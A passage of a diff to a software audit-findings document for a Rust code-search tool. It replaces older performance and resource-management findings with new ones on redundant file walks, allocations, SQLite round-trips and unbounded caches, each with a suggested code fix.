-- **Description:** PR #1105 added the per-project `.cqs/embeddings_cache.db` keyed by `(content_hash, model_id)` so a chunk re-embedded after a model swap or a new slot can hit cache instead of going through the GPU. The bulk index path (`prepare_for_embedding`) checks both `global_cache.read_batch` and `store.get_embeddings_by_hashes`. The watch reindex hot path (`reindex_files`) at line 2877 only calls `store.get_embeddings_by_hashes(&hashes)` — it never sees `EmbeddingCache`. Net effect: every file change in watch mode goes through the embedder for any chunk whose content_hash isn't in the *current slot's* `chunks.embedding` column, even if the same hash was already computed in another slot or in a prior model that lives in the global cache. The watch loop is the highest-frequency embedder consumer (every file save during active development); missing the global cache here costs the most.
-- **Suggested fix:** Plumb `global_cache: Option<&EmbeddingCache>` through `cmd_watch` → `reindex_files`. Replace lines 2876-2887 with a call to the same `prepare_for_embedding` helper the bulk pipeline uses (it already handles the `global cache → store cache → embed` fallback chain, including the dim mismatch guard). Eliminates the diverging cache-check code and makes the watch path benefit from #1105 the way the bulk path already does.
+- **Location:** `src/cli/watch/mod.rs:1198-1283` (idle-tick gating + dispatch); `src/cli/watch/gc.rs:209` and `src/cli/watch/reconcile.rs:74` (the two `enumerate_files` callsites); `src/lib.rs:574-689` (the walk itself, including per-entry `dunce::canonicalize`)
+- **Description:** When the daemon idles ≥ `daemon_periodic_gc_idle_secs()` (default 60s), both periodic GC and periodic reconcile may fire in the same tick: GC's `Duration::from_secs(daemon_periodic_gc_interval_secs())` (default 1800s) gates Pass 1, reconcile's `daemon_reconcile_interval_secs()` (default 30s) gates the second walk. Their idle gates are identical, so on tick boundaries that satisfy both intervals, the daemon walks the whole working tree **twice in succession**, each walk doing per-file canonicalisation through `dunce::canonicalize` (line 659). On a 17k-chunk corpus with ~3-5k unique source files on WSL `/mnt/c/`, each walk is ~1s wall (per the docstring on `DAEMON_RECONCILE_INTERVAL_SECS_DEFAULT`); doing it twice back-to-back is a 2s contention window every 30 minutes. Worse: even when only one fires, both call paths build a `HashSet<PathBuf>` of disk files (gc.rs:211, reconcile.rs:84+95), so the same data is materialised twice in the same tick whenever both run.
+- **Suggested fix:** Lift the walk out of both call sites: walk once at the top of the idle-tick block, share the resulting `HashSet<PathBuf>` between GC's `prune_missing` and reconcile's loop. Both already operate on the same set of disk files; the only daylight is reconcile checks each file's mtime and GC checks its existence, both derivable from one walk. Given `daemon_periodic_gc_idle_secs()` is the single shared idle gate, the walk-once refactor is purely organisational — no semantic change, no new env knob.
 
-#### [PF-V1.30-3]: `reindex_files` allocates N empty `Embedding` placeholders then overwrites each
+---
+
+#### PF-V1.30.1-4: `run_daemon_reconcile` allocates a fresh `String` for every disk file via `to_string_lossy().replace('\\', "/")` even on Linux where no replacement happens
 - **Difficulty:** easy
-- **Location:** `src/cli/watch.rs:2918-2924`
-- **Description:** `let mut embeddings: Vec<Embedding> = vec![Embedding::new(vec![]); chunk_count];` allocates `chunk_count` placeholder `Embedding` structs (each with an empty inner `Vec<f32>`), then immediately overwrites every slot via the cached + new-embedding loops at 2919-2923. Even setting aside the constructor cost, the `Embedding` type holds normalized-state metadata; the placeholders may need `Embedding::try_new(vec![])` validation in a future refactor and silently produce zero-norm vectors today. Allocation pattern is also wasteful — for a 100-file batch with 3000 chunks, that's 3000 `Embedding::new(vec![])` calls with discarded results.
-- **Suggested fix:** Build `embeddings` directly from the (cached, new) iterators rather than placeholder-then-overwrite. Either: (1) sort `cached` and `to_embed` indices and merge in order, or (2) build a `HashMap<usize, Embedding>` and `(0..chunk_count).map(|i| map.remove(&i).unwrap_or_else(...))` — but better is to refactor the same way the bulk pipeline does (`create_embedded_batch` at `src/cli/pipeline/embedding.rs:127-143`): zip cached + (to_embed/new_embeddings) in original order without ever materializing a placeholder Vec. This is the same pattern the bulk path already proved.
+- **Location:** `src/cli/watch/reconcile.rs:99` inside the `for rel in disk_files` loop
+- **Description:** For every file enumerated (3-5k on a typical 17k-chunk corpus), the loop runs `let origin = rel.to_string_lossy().replace('\\', "/")`. `String::replace` *always* allocates a new `String`, even when no occurrences of the pattern are found. On Linux there are zero backslashes in any path, so every iteration pays an unconditional ~50-100 byte allocation that produces an exact byte-equal copy of the input. With reconcile firing every 30s, that's ~3-5k unnecessary allocs per tick, ~360-600k per hour from this single line. The function also already calls `rel.clone()` separately at line 103 and 128 for the `pending_files.insert`, so the per-file allocation budget is doubled.
+- **Suggested fix:** Skip the replacement when no backslash is present. `let origin = rel.to_string_lossy(); let origin: Cow<str> = if origin.contains('\\') { Cow::Owned(origin.replace('\\', "/")) } else { origin };` — Linux fast path stays as a `Cow::Borrowed`, only Windows pays the allocation. Then `indexed.get(origin.as_ref())` works against the `HashMap<String, _>` by `&str`. Cuts the hot-loop allocation count roughly in half on Linux and WSL.
 
-#### [PF-V1.30-4]: `prepare_for_embedding` always issues store-cache query even when global cache fully satisfies the batch
+---
+
+#### PF-V1.30.1-5: `build_stats` issues 4 sequential `fetch_one` round-trips for what is one query
 - **Difficulty:** easy
-- **Location:** `src/cli/pipeline/embedding.rs:64-82`
-- **Description:** `prepare_for_embedding` first queries the global `EmbeddingCache` (line 47) populating `global_hits`, then UNCONDITIONALLY queries the store cache (line 68) for the same `hashes` slice. On the warm-cache path (e.g. reindex after `cqs slot promote`, or any reindex where chunks are unchanged), the global cache hit-rate approaches 100% and every store query is wasted DB work. The store query at `get_embeddings_by_hashes` is one SELECT but with O(n) bind variables and a JOIN against the `chunks` table — non-trivial latency on big batches. The fix is to filter the second query to only hashes the global cache missed.
-- **Suggested fix:** Compute `let missed_hashes: Vec<&str> = hashes.iter().filter(|h| !global_hits.contains_key(*h)).copied().collect()` and pass `&missed_hashes` to `store.get_embeddings_by_hashes`. When all chunks hit global cache, the store query is skipped entirely. When none do, behaviour is identical to today. Additional comment at line 84 about the `global cache > store cache > embed` precedence is already correct; the implementation just doesn't act on it for the second query.
+- **Location:** `src/serve/data.rs:1105-1128` (`build_stats`)
+- **Description:** The function makes four serial round-trips through the connection pool: `COUNT(*) FROM chunks`, `COUNT(DISTINCT origin) FROM chunks`, `COUNT(*) FROM function_calls`, `COUNT(*) FROM type_edges`. Each `fetch_one` call against a sqlx pool (a) checks out a connection, (b) prepares/binds, (c) round-trips to SQLite, (d) returns the connection. SQLite is in-process so per-call latency is small (~tens of microseconds), but the call is on the hot HTTP path of the `cqs serve` UI and runs once per page render of the dashboard (and on every poll if the front-end refreshes). One query with subselects collapses 4 connection checkouts into 1 with no functional change.
+- **Suggested fix:** ```sql
+SELECT
+  (SELECT COUNT(*) FROM chunks),
+  (SELECT COUNT(DISTINCT origin) FROM chunks),
+  (SELECT COUNT(*) FROM function_calls),
+  (SELECT COUNT(*) FROM type_edges)
+``` parsed into `(i64, i64, i64, i64)` via `query_as`. 1 connection checkout, 1 round-trip. Strictly faster, identical semantics.
 
-#### [PF-V1.30-5]: `wrap_value` deep-clones the entire payload via `serde_json::to_value(Envelope::ok(&payload))`
+---
+
+#### PF-V1.30.1-6: `enforce_auth` allocates two strings per HTTP request for the cookie name and the `name=` lookup needle
+- **Difficulty:** easy
+- **Location:** `src/serve/auth.rs:357` (`cookie_name_for_port` call); `src/serve/auth.rs:292` (`format!("{cookie_name}=")` inside `check_request`)
+- **Description:** Per HTTP request, `enforce_auth` runs `let cookie_name = cookie_name_for_port(state.cookie_port)` which `format!`s `"cqs_token_<port>"` into a fresh `String`. It then passes that to `check_request`, which immediately runs `let needle = format!("{cookie_name}=")` — a second `format!` allocating yet another `String` just to hold the lookup prefix. The cookie name for a given server instance is fixed at server startup (the port doesn't change), so both strings could be precomputed once into `AuthMiddlewareState` and borrowed per request. For a UI doing tens of requests per second (browsing the graph, polling `/health`), this is two allocations per request that buy nothing. Bounded, but unnecessary.
+- **Suggested fix:** Add `cookie_name: Arc<str>` and `cookie_lookup_needle: Arc<str>` fields to `AuthMiddlewareState`, populated at construction time from `cookie_name_for_port(port)` and `format!("{cookie_name}=")`. Update `check_request` to take `&str` for the needle (or borrow from state directly). Both fields are `Arc<str>` so `Clone` of the state stays cheap. Net: zero allocations per request for the auth happy path.
+
+---
+
+#### PF-V1.30.1-7: Watch reindex clones each `content_hash` String into a `Vec<String>` for incremental HNSW even when the data is read-only thereafter
+- **Difficulty:** easy
+- **Location:** `src/cli/watch/reindex.rs:414-417`
+- **Description:** ```rust
+let content_hashes: Vec<String> = to_embed
+    .iter()
+    .map(|(_, c)| c.content_hash.clone())
+    .collect();
+``` Each `content_hash` is a 64-char hex string (~64 byte allocation). For a typical incremental-watch pass that re-embeds 50-200 chunks, this is 50-200 unnecessary allocations per cycle; bigger reindex bursts (e.g. branch switch with 1000 changed chunks) scale linearly. The chunks themselves outlive this `Vec` (they're owned earlier in the function), so the clone exists only because the downstream HNSW API takes `Vec<String>` rather than `&[&str]`. A consumer that takes borrowed strs would let this Vec be `Vec<&str>` with no allocation per element.
+- **Suggested fix:** Two paths. (1) Change the downstream HNSW insert API to take `&[&str]` — works if no caller stores the slice past the call. (2) If the API contract requires owned strings (e.g. async insert that captures), at least preallocate `Vec::with_capacity(to_embed.len())` to avoid Vec resizes. Option 1 is the real fix; option 2 is the cheap one. Worth pairing with `Arc<str>` for `Chunk::content_hash` if it's referenced from multiple places (it is: `store_hits`, `global_hits`, the chunk itself).
+
+---
+
+#### PF-V1.30.1-8: `indexed_file_origins` returns `HashMap<String, Option<i64>>` populated from a `SELECT DISTINCT` that may overwrite entries silently when one origin has multiple stored mtimes
 - **Difficulty:** medium
-- **Location:** `src/cli/json_envelope.rs:160-176`
-- **Description:** `wrap_value(&serde_json::Value)` constructs `Envelope::ok(payload)` (which holds `&Value`), then serializes-and-parses the whole envelope via `serde_json::to_value`. For `serde_json::Value` the `Serialize` impl visits every node and rebuilds an identical tree — a deep clone disguised as a re-serialization round trip. The function is called once per daemon dispatch via `crate::cli::batch::write_json_line` and once per CLI emit, so every `cqs gather --tokens 50000` (which can be 50KB+ of nested objects), every `cqs scout`, every `cqs review` output pays the cost. The header comment at line 153-155 acknowledges "shallow clone of the payload (necessary because `serde_json::json!` macro takes ownership)" — but this isn't shallow, the serde_json round trip walks the whole tree and reallocates every Map and Vec. For a typical 30KB gather payload, that's ~30KB of allocator churn per query; on a busy daemon at 100 QPS that's ~3MB/s of pointless allocator pressure plus the CPU walking the tree.
-- **Suggested fix:** Build the envelope as a `serde_json::Value::Object` directly without a typed-struct round trip. `serde_json::Map::from_iter([("data", payload.clone()), ("error", Value::Null), ("version", Value::Number(1.into()))])`. Single shallow clone of the payload's outer enum tag (the inner Map/Vec stays owned) instead of a tree walk. Even better: change the contract so callers pass an *owned* `serde_json::Value` and `wrap_value` moves it in — `Map::insert("data", payload)` doesn't allocate a copy at all. Most call sites (`batch/mod.rs::write_json_line`) already produce the value just-in-time; switching to by-value is a per-site noop.
+- **Location:** `src/store/chunks/staleness.rs:627-637`
+- **Description:** The query `SELECT DISTINCT origin, source_mtime FROM chunks WHERE source_type='file'` returns one row per (origin, mtime) **pair**. If a file's chunks were written across two upserts at different mtimes (a known edge case during partial reindex failures, or transient writes during a watch tick), `rows.into_iter().collect::<HashMap<_,_>>()` arbitrarily picks the **last** one in iteration order — silently dropping the earlier mtimes. From the reconcile caller's perspective, the wrong stored mtime causes either a missed reindex (if the chosen mtime happens to be ≥ disk mtime) or a spurious one. More fundamentally: `DISTINCT` is doing extra work the index could skip. The caller wants one row per origin with a deterministic mtime — it should be the **max** stored mtime, since reindex semantics are "did anything indexed for this origin lag the disk." A `GROUP BY origin` with `MAX(source_mtime)` produces fewer rows, no nondeterminism, and the index already supports it. As-is, the DISTINCT scan returns up to 17k rows for a 3k-file corpus when chunks-per-file averages 5 and mtimes-per-origin diverges; that's wasted SQLite work plus wasted hashmap insertions.
+- **Suggested fix:** Replace the query with `SELECT origin, MAX(source_mtime) FROM chunks WHERE source_type='file' GROUP BY origin`. Returns one row per origin with the most-recent stored mtime, which is the semantically correct value for reconcile's `disk > stored` predicate. Fixes the silent-drop bug and reduces row count to exactly the file count.
+# Audit Findings — Resource Management (v1.30.1, 2026-04-28)
 
-#### [PF-V1.30-6]: Daemon socket handler walks the args array twice (validation pass + extraction pass)
-- **Difficulty:** easy
-- **Location:** `src/cli/watch.rs:266-297`
-- **Description:** `handle_socket_client` first scans `request.get("args")` to collect indices of non-string elements (`bad_arg_indices`, lines 267-274), and if the array is clean does a SECOND pass via `arr.iter().filter_map(|v| v.as_str().map(String::from))` (lines 291-296) to materialize the `Vec<String>`. Each daemon query thus walks the `serde_json::Value::Array` twice. Cheap individually but it's literally the request entry point — every daemon query at 100+ QPS pays this. Combine the two passes: do the strict-string validation while building the `Vec<String>` and bail out the moment a non-string is observed.
-- **Suggested fix:** Fold both passes into one:
-```rust
-let mut args = Vec::new();
-let mut bad_arg_indices = Vec::new();
-if let Some(arr) = request.get("args").and_then(|v| v.as_array()) {
-    for (i, v) in arr.iter().enumerate() {
-        match v.as_str() {
-            Some(s) => args.push(s.to_string()),
-            None => bad_arg_indices.push(i),
-        }
-    }
-}
-if !bad_arg_indices.is_empty() { /* reject */ }
-```
-One pass instead of two; preserves the existing reject-with-indices error message.
+Audit mode: ON. Scope: memory leaks, fd leaks, idle CPU/memory cost,
+startup time, OOM protection, RAII discipline, clone/copy of huge buffers,
+hash-table growth without bound. Triage state checked against
+`docs/audit-triage-v1.30.0.md` (RM-V1.30-* covered) and prior audit
+findings in `docs/audit-findings.md`.
 
-#### [PF-V1.30-7]: `build_graph` correlated subquery for n_callers — N rows × per-row COUNT(*) instead of one GROUP BY
-- **Difficulty:** medium
-- **Location:** `src/serve/data.rs:234-264`
-- **Description:** The node-fetch SQL in `build_graph` includes `COALESCE((SELECT COUNT(*) FROM function_calls fc WHERE fc.callee_name = c.name), 0) AS n_callers_global` as a correlated subquery in the SELECT. SQLite executes the subquery once per row scanned. With `idx_callee_name` present the per-row cost is O(log M) where M = function_calls row count (~30k+ in this repo), and N is the cap'd graph size (`ABS_MAX_GRAPH_NODES`, currently 5000). That's 5000 × log(30k) ≈ 75k index probes for one `/api/graph` request. A single `LEFT JOIN (SELECT callee_name, COUNT(*) AS n FROM function_calls GROUP BY callee_name)` aggregates once and joins by name — one full scan + one hash join, O(M + N), independent of N. On larger projects (the cqs serve /api/graph endpoint is the biggest data fetch in the new web surface) the difference is several hundred ms vs single-digit ms.
-- **Suggested fix:** Replace the correlated subquery with a JOIN against an aggregated subselect:
-```sql
-SELECT c.id, c.name, c.chunk_type, c.language, c.origin, c.line_start, c.line_end,
-       COALESCE(cc.n, 0) AS n_callers_global
-FROM chunks c
-LEFT JOIN (SELECT callee_name, COUNT(*) AS n FROM function_calls GROUP BY callee_name) cc
-  ON cc.callee_name = c.name
-WHERE 1=1 ... ORDER BY n_callers_global DESC, c.id ASC LIMIT ?
-```
-Same result, single aggregation pass. Also benefits `build_hierarchy` which has a similar shape (`src/serve/data.rs:670-754`).
-
-#### [PF-V1.30-8]: `build_graph` edge-dedup HashSet keys clone (file, caller, callee) per row even on dedup miss
-- **Difficulty:** easy
-- **Location:** `src/serve/data.rs:367-373`
-- **Description:** The edge dedup loop builds `let key = (file.clone(), caller.clone(), callee.clone())` for every row regardless of whether the row will be kept, then `seen.insert(key)` — three String clones per fetched row. With `ABS_MAX_GRAPH_EDGES` typical at tens of thousands, that's tens of thousands of extra String allocations per `/api/graph` request, most of them duplicating work the row decode already did (`row.get("file")` already returned an owned String). The pattern was lifted from a deduplicating insert in another module but here the strings are small and the surrounding loop bound is ABS_MAX_GRAPH_EDGES so the cost compounds.
-- **Suggested fix:** Two options. (1) Skip the dedup entirely — the SQL `LIMIT` + the symmetric `IN (...)` twice over already over-fetches; deduping at the resolver step at line 396 is enough since the resolver is a `HashMap` lookup that naturally collapses duplicates by ignoring them. (2) Keep the dedup but switch to a hash-of-bytes key:
-```rust
-use std::collections::hash_map::DefaultHasher;
-let mut h = DefaultHasher::new();
-file.hash(&mut h); caller_name.hash(&mut h); callee_name.hash(&mut h);
-let hash_key = h.finish();
-if seen.insert(hash_key) { accum.push((file, caller_name, callee_name)); }
-```
-Hash collisions on a `u64` keyed `HashSet<u64>` are negligible at <1M edges. Cuts allocations from 3N+1 strings to ~zero.
-
-#### [PF-V1.30-9]: `extract_imports` uses `HashSet<String>` — allocates a `String` per candidate line even on duplicate rejection
-- **Difficulty:** easy
-- **Location:** `src/where_to_add.rs:258-276`
-- **Description:** `extract_imports` iterates every line of every chunk, and for every line that matches a prefix it calls `seen.insert(trimmed.to_string())`. The HashSet stores `String` so insertion always allocates, even when the value is rejected as a duplicate (HashSet still hashes its borrowed key, but the caller materialized the String first). For a Rust file with ~50 chunks × ~30 lines/chunk × 5 prefixes, that's ~7500 `to_string` calls per `cqs where`/`cqs task` invocation — most of which are non-import lines that matched the prefix loosely or duplicate imports already seen. Lines borrowed from `chunks` are valid for the lifetime of the function so a borrowed-key HashSet works.
-- **Suggested fix:** Switch `seen` to `HashSet<&str>` with the same lifetime as `chunks`:
-```rust
-let mut seen: HashSet<&str> = HashSet::new();
-let mut imports: Vec<String> = Vec::new();
-for chunk in chunks {
-    for line in chunk.content.lines() {
-        let trimmed = line.trim();
-        for &prefix in prefixes {
-            if trimmed.starts_with(prefix) && imports.len() < max && seen.insert(trimmed) {
-                imports.push(trimmed.to_string());  // Allocate only on accept
-                break;
-            }
-        }
-    }
-}
-```
-Allocation now happens only for accepted imports (capped at `max=5`), not per candidate line. ~1500× fewer String allocations on a typical Rust file.
-
-#### [PF-V1.30-10]: Watch `reindex_files` cached embedding clone via `existing.get` instead of `.remove`
-- **Difficulty:** easy
-- **Location:** `src/cli/watch.rs:2879-2887`
-- **Description:** The cached-embedding loop:
-```rust
-for (i, chunk) in chunks.iter().enumerate() {
-    if let Some(emb) = existing.get(&chunk.content_hash) {
-        cached.push((i, emb.clone()));   // clone every cached Embedding
-    } else {
-        to_embed.push((i, chunk));
-    }
-}
-```
-Every cache hit clones the `Embedding` (inner `Vec<f32>`, dim=1024 default = 4KB allocation per hit). For a 100-file save that touches 500 chunks with 80% cache hit rate, that's ~400 × 4KB = 1.6MB of allocator churn per watch event — and watch events fire on every save in active development. The `existing` map is consumed only by this loop and discarded afterward, so we can `.remove()` to take ownership instead.
-- **Suggested fix:** Make `existing` mutable (already is — `let mut`isn't there but the binding owns the map) and use `existing.remove(&chunk.content_hash)` to take ownership:
-```rust
-let mut existing = store.get_embeddings_by_hashes(&hashes)?;
-let mut cached: Vec<(usize, Embedding)> = Vec::new();
-let mut to_embed: Vec<(usize, &cqs::Chunk)> = Vec::new();
-for (i, chunk) in chunks.iter().enumerate() {
-    if let Some(emb) = existing.remove(&chunk.content_hash) {
-        cached.push((i, emb));
-    } else {
-        to_embed.push((i, chunk));
-    }
-}
-```
-Eliminates every Embedding clone on the cache-hit path. Mirrors the `global_hits.remove` pattern already used at `src/cli/pipeline/embedding.rs:97`. P3 #126-style fix the watch path missed.
-
+---
 
 ## Resource Management
 
-#### [RM-V1.30-1]: Background HNSW rebuild thread is detached — daemon shutdown cannot wait for it
-- **Difficulty:** medium
-- **Location:** `src/cli/watch.rs:965-1042` (`spawn_hnsw_rebuild`)
-- **Description:** PR #1113 spawns a background HNSW rebuild via `std::thread::Builder::new().name(...).spawn(...)` and stores only the mpsc `Receiver` in `PendingRebuild` (line 1037-1041). The `JoinHandle` is dropped immediately, so the thread is detached. On `systemctl stop cqs-watch` (SIGTERM) the daemon's main loop exits and `WatchState` drops, but the rebuild thread (which holds its own `Store::open_readonly_pooled` handle plus a CUDA build pipeline at `commands::build_hnsw_index_owned`) keeps running until it sends on the channel — even though the receiver is already gone. On the user's A6000 a full 17k-chunk CUDA HNSW build is ~10-15s, plus another ~10-15s for the base index. Worst case: a `systemctl restart cqs-watch` triggers a fresh rebuild on the new daemon while the old daemon's orphaned rebuild thread is still spending GPU memory + CUDA streams on the now-discarded result. Two CUDA HNSW builds running concurrently against the same `index.db` snapshot is exactly the contention pattern that leads to `cuda_runtime` API errors (cuvs is process-global, not per-context). In addition, `index.hnsw.lock` may be re-acquired by the new daemon while the old thread still has it open via `Owned::save` — leading to a half-written graph file.
-- **Suggested fix:** Hold the `JoinHandle` inside `PendingRebuild` next to `rx`. On daemon shutdown (the `loop` exit in `cmd_watch`), call `pending_rebuild.take().map(|p| p.handle.join())` with a bounded timeout (e.g. 2s) before letting the daemon exit. Better: have `spawn_hnsw_rebuild` accept a `Arc<AtomicBool>` cancellation flag, check it inside `build_hnsw_index_owned` between batches, and bail with `RebuildOutcome::Err(anyhow!("cancelled"))` so the GPU work stops promptly.
-
-#### [RM-V1.30-2]: `pending_rebuild.delta` grows unbounded during a long rebuild window
+#### RM-1: `daemon-client` thread_local `REQ_LINE` is a no-op — daemon spawns a fresh thread per accepted connection
 - **Difficulty:** easy
-- **Location:** `src/cli/watch.rs:611,623-626,2667-2674,2740-2741`
-- **Description:** While a background HNSW rebuild is in flight (10-30s), every reindex cycle appends every newly-embedded chunk into `pending.delta: Vec<(String, Embedding)>` (line 2674). Each `Embedding` is `dim × 4 bytes` ≈ 4 KB on BGE-large (1024-dim). A bulk file operation during the rebuild — e.g. `git checkout` of a feature branch touching 5k files, `find -name '*.rs' -exec sed -i ...`, or a `cargo fix` pass — can push tens of thousands of chunks into the delta before the rebuild completes. 30k entries × 4 KB = 120 MB held in `WatchState`, on top of the rebuild thread's own working memory and the in-memory `state.hnsw_index`. There is no cap, no warn-on-overflow, no spill-to-disk fallback, and no early-cancel of the in-flight rebuild even when delta has already invalidated the snapshot it's building from.
-- **Suggested fix:** Cap `delta` at e.g. `MAX_PENDING_REBUILD_DELTA = 5_000` entries (~20 MB on 1024-dim). On overflow: `tracing::warn!`, drop oldest entries (or all of them — the next `threshold_rebuild` will pick the chunks up from SQLite anyway), and mark the rebuild as `state.pending_rebuild = None` to short-circuit the swap entirely (the new in-memory index would be ~useless given the volume of misses). Add a structured event so operators can see when the daemon entered "delta saturation" mode.
+- **Location:** `src/cli/watch/socket.rs:91-99` (the `thread_local!` declaration) + `src/cli/watch/daemon.rs:189-205` (the spawn site)
+- **Description:** The comment at `socket.rs:92-96` justifies a `thread_local! REQ_LINE: RefCell<String>` with: *"`handle_socket_client` runs on a Tokio blocking-pool thread that services many connections in succession. Allocating a fresh `String` (and its grow-during-`read_line` churn) per accept is ~80% of the allocator pressure on this path under high-QPS agent workloads."* That premise is wrong. `daemon.rs::spawn_daemon_thread` spawns a brand-new `std::thread::Builder` thread *for every accepted connection* (line 189), not a Tokio blocking pool with thread reuse. The thread terminates on connection close, taking the thread_local with it. Net effect: every connection still pays one fresh `String::with_capacity(8192)` allocation, plus the additional thread_local-init overhead, and the comment's "80%" claim is unfounded. (The Tokio blocking pool only services axum's `cqs serve` — a different binary path.) The optimization (RM-V1.29-10 / #1116) was either misanalyzed or attached to the wrong dispatch path.
+- **Suggested fix:** Either (a) drop the `thread_local!` and use a plain `let mut line = String::with_capacity(8192)`; the cost is identical, the code is simpler, and the comment stops lying; or (b) port the daemon to a real thread pool (`rayon`, a bounded `crossbeam` worker fan-out, or a Tokio current-thread + blocking-pool dispatch) so the thread_local actually amortizes. (a) is the one-line fix; (b) is an architectural change that would need its own design pass.
 
-#### [RM-V1.30-3]: `Embedder::new` opens a fresh `QueryCache` SQLite + 7-day prune on every CLI subcommand
+#### RM-2: `wait_for_fresh` opens a fresh Unix socket connect+disconnect every 250ms for up to 600s
+- **Difficulty:** medium
+- **Location:** `src/daemon_translate.rs:660-679` (poll loop) + `src/daemon_translate.rs:438` (per-call `UnixStream::connect`)
+- **Description:** `wait_for_fresh` is the shared client-side polling primitive for `cqs status --watch-fresh --wait` and `cqs eval --require-fresh`. Each iteration calls `daemon_status`, which opens a fresh `UnixStream::connect`, sets read/write timeouts, writes a 30-byte JSON request, reads a 64 KiB-bounded response, and drops the stream. The poll cadence is 250 ms; the caller's deadline is `wait_secs` (clap default 30 s, max 600 s = 2400 round trips). On the daemon side, every connection: (1) wakes the accept loop's `WouldBlock`-poll thread, (2) spawns a *fresh OS thread* (see RM-1 — there is no thread pool), (3) takes the `BatchContext` mutex to dispatch `status`, (4) RwLock-reads the snapshot, (5) tears the thread down. Two concurrent `eval --require-fresh` runs (a real scenario when an agent batch fans out) easily generate 4-5k connect-spawn-teardown cycles in a 60s wait. None of this is *catastrophic* — Unix sockets are cheap — but for a primitive that's now on the hot path of #1182 (the freshness gate) the cost shape is wrong. The daemon's accept loop also pays this cost end-to-end on a polling tick + thread spawn.
+- **Suggested fix:** Either (a) keep the `UnixStream` open across polls inside `wait_for_fresh` and reuse it for subsequent `status` requests (one connect + N writes + N read_lines until either fresh or timeout); or (b) switch the freshness signal to a daemon-pushed event (e.g., write an inotify-watchable `.cqs/freshness` marker file when the snapshot transitions to `Fresh`, have the client `inotify_wait` on it). (a) is a 30-line change confined to `daemon_translate.rs`; (b) eliminates polling entirely but is invasive. Either way, RM-1's "fresh-thread-per-accept" pain disappears for the freshness-wait case.
+
+#### RM-3: `compute_context` reads the entire source file into memory just to extract N context lines per search result
 - **Difficulty:** easy
-- **Location:** `src/embedder/mod.rs:355-366`
-- **Description:** `Embedder::new` unconditionally calls `QueryCache::open(&QueryCache::default_path())` followed by `c.prune_older_than(7)` (line 358-361), even on commands that will never call `embed_query` (e.g. `cqs notes list`, `cqs read`, `cqs slot list`, `cqs cache stats`, `cqs explain --no-embed`). The `QueryCache` is constructed lazily *during the embedder*, but the embedder itself is constructed eagerly by every CLI handler that takes a `cli.try_model_config()` (16 call sites in `Bash` cross-check above). Each open is: `std::fs::create_dir_all` + `chmod 0o700` + new tokio `current_thread` runtime + SqlitePool with `max_connections=1` + 4 PRAGMA + WAL setup + `prune_older_than(7)` (a `DELETE` against `query_cache`). Cold start of `cqs --help` (which already lazy-loads the embedder for completion) pays this; a hot `cqs notes list` run via daemon doesn't, but a CLI bypass (`CQS_NO_DAEMON=1`) does. On WSL DrvFS this is ~30-50ms of completely wasted I/O per invocation.
-- **Suggested fix:** Lazy-open the disk cache the first time it's actually used inside `embed_query`. Store it as `OnceLock<Option<QueryCache>>` rather than constructing eagerly in `new_with_provider`. The in-memory `LruCache` stays as-is; only the SQLite-backed half pays the cold open. Bonus: cli subcommands that are pure SQL (notes, slot, cache, telemetry) no longer touch `~/.cache/cqs/query_cache.db` at all.
+- **Location:** `src/cli/display.rs:59-99` (and second instance at `src/cli/display.rs:489`)
+- **Description:** `compute_context` is called once per search result to produce the few lines of code shown above and below the chunk's `line_start`/`line_end`. Implementation does `std::fs::read_to_string(file)` followed by `let lines: Vec<&str> = content.lines().collect()` — pulling the entire file into RAM and materializing a `Vec<&str>` covering every line, only to slice `[start..end]` near the bottom. With the default `cqs search --limit 50` and a 200-300 KB source file per result (large generated code, vendored JSON, schema files, etc.) this is up to ~15 MB of transient allocations per command, all to display ~10 lines per hit. There's a `max_display_size` cap (`CQS_MAX_DISPLAY_FILE_SIZE`, default 1 MiB) — but that just caps the worst case; the typical case still reads everything when it could read a small window. The 1 MiB cap also doesn't help an agent fanning out 20 searches against a typical Rust monorepo where 1MB files exist.
+- **Suggested fix:** Use `std::io::BufReader::new(File::open(path))` plus `.lines().enumerate()` and break out of the iteration once `enumerate()` reaches `max(end_idx, end_idx + context) + 1`. This bounds the read to `O(line_end + context)` lines (typically <1 KB) instead of `O(file_size)`. Same number of syscalls, much less heap. Apply at both call sites (display.rs:59 and :489).
 
-#### [RM-V1.30-4]: `LocalProvider::stash` retains all submitted batch results until provider drop
+#### RM-4: `build_hnsw_index_owned` accumulates a full `HashMap<String, String>` of (id, content_hash) snapshots that's only used at swap time
 - **Difficulty:** medium
-- **Location:** `src/llm/local.rs:74,304-309,542-547`
-- **Description:** `LocalProvider::submit_via_chat_completions` (PR #1101) stores each submitted batch's results in `self.stash: Mutex<HashMap<String, HashMap<String, String>>>`, keyed by batch_id. The only path that removes entries is `fetch_batch_results` (line 545: `stash.remove(batch_id)`). If a caller submits multiple batches and crashes (or panics) between submit and fetch, all unfetched batches stay resident for the lifetime of the `LocalProvider`. Even on the happy path, a long-running `cqs index --llm-summaries` over a 5k-chunk corpus with `concurrency=4` may submit several batches sequentially: each batch ~250 successful items × 500-byte summary text ≈ 125 KB stashed at a time, but if a batch fails the entries-so-far are retained anyway because the function returns `Err(LlmError::Api{...})` after inserting partial results into the stash (line 304-309 happens unconditionally before the auth-fail bail at 286). Worst case for a 50k-chunk doc-comments pass with 50% timeout failures: ~25k summaries × ~500 bytes = ~12 MB of dead text held in the provider until the CLI exits. There is no LRU, no TTL, no "drain everything older than N" sweep.
-- **Suggested fix:** (1) Move the stash insert past the auth-fail bail so failed batches don't leak partial results. (2) Add `LocalProvider::drain_old_batches(&self, max_keep: usize)` called from the outer `llm_summary_pass` after each `wait_for_batch + fetch_batch_results` cycle. (3) On the auth-fail Err arm at line 286, explicitly clear the stash entry. (4) Cap total stash size: if it exceeds e.g. 1000 batches or 100 MB cumulative, evict oldest by insertion order.
+- **Location:** `src/cli/commands/index/build.rs:1110-1126` (build) + `src/cli/watch/rebuild.rs:262-267` (carries it across thread boundary) + `src/cli/watch/rebuild.rs:368-380` (consumes at swap)
